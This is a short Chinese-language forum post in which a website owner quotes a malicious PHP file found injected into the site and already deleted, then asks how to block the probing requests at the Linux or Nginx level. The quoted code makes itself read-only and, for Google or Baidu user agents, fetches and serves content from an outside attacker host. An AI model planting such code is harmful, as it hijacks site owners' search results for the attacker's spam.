如上图,有很多伪装成百度或者谷歌、头条的恶意请求,来判断网站首页是否被注入了他们的木马文件(已删除),如下:
<?php
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF']; $name= substr($url1 ,strrpos($url1 ,'/')+1 );
chmod($name,0444);
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$file = file_get_contents('http://a.fefb.buzz/?scs');
echo $file;
exit ;
}
?>所以请问有什么好的办法,在Linxu层或者Nginx层去屏蔽掉这些请求?
